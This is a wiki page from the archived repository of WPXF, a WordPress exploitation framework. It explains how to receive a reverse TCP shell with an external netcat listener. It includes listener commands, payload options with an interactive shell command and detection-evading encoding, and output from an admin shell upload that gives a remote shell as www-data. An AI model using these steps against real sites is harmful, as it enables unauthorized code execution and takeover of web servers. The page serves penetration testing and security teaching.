This repository has been archived by the owner on Oct 22, 2020. It is now read-only.

Using a Third Party TCP Server with Reverse TCP Payload

Rob edited this page Aug 11, 2018 · 2 revisions

The reverse_tcp payload, by default, starts its own TCP server inside WPXF to accept the incoming connection from the target. There are scenarios in which you instead need a third party tool to listen for that connection, for example when the target machine has to connect back to a machine other than the one you are running WPXF on (because only that machine is reachable from the target).

Starting the external TCP server

How you do this during an actual audit will depend on your requirements. For the sake of this example, we'll use netcat to listen on port 1234 by running the following command on a host that has netcat installed:

netcat -l -n -v 1234

If you're using Windows, a good alternative to netcat is ncat, available here: https://nmap.org/ncat/ (the equivalent command is ncat -l -n -v 1234). Note that the flags differ between netcat variants: the command above is for the OpenBSD netcat, whereas the traditional netcat expects the port after -p (netcat -l -n -v -p 1234). Whichever tool you use, make sure it is listening and that the port is reachable from the target before running the exploit, because the payload only attempts the connection once.

Configuring the payload

Once the TCP server is listening for incoming connections, start WPXF and load an exploit module. In this example, we'll just be using the generic admin shell upload (exploit/shell/admin_shell_upload).

Once the module is loaded, set the payload to reverse_tcp and take a look at the available options using show options. You'll see that there is an option named listen_with_wpxf in the list:

Name               Current Setting               Required   Description
----------------   ---------------------------   --------   --------------------------------------------
listen_with_wpxf   true                          true       Listen for an incoming connection using WPXF

Setting this option to false stops WPXF from starting its own TCP server when the exploit is executed. In addition, set the lhost option to the address of the host that netcat is running on, as seen from the target (not the address of the WPXF host), and set lport to the port netcat is listening on.

After setting these options, your payload options should look similar to the below:

Name               Current Setting               Required   Description
----------------   ---------------------------   --------   -------------------------------------------------------------------------
encode_payload     true                          true       Encode the payload to avoid fingerprint detection
shell              uname -a; w; id; /bin/sh -i   true       Shell command to run
lhost              192.168.1.16                  true       The address of the host listening for a connection
lport              1234                          true       The port being used to listen for incoming connections
chunk_size         1400                          true       TCP chunk size
listen_with_wpxf   false                         true       Listen for an incoming connection using WPXF
bind_to_address    0.0.0.0                       true       The address to bind to when using WPXF to listen for incoming connections

Running the module

Set the remaining module options (target host, credentials, etc.) and start the exploit using run. WPXF will report that the payload was executed, but the session itself is established on the host running the TCP server we started earlier with netcat, not inside WPXF:

Host running WPXF:

[-] Authenticating with WordPress using root:toor...
[-] Uploading payload...
[-] Executing the payload at
    http://192.168.1.15/wordpress/wp-content/plugins/xqbBGFpVuL/pTbgOnSeqi.php...
[+] Execution finished successfully

Host running netcat:

Listening on [0.0.0.0] (family 0, port 1234)
Connection from [192.168.1.15] port 1234 [tcp/*] accepted (family 2, sport 37692)
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 21:15:25 up 1 min,  0 users,  load average: 0.40, 0.21, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$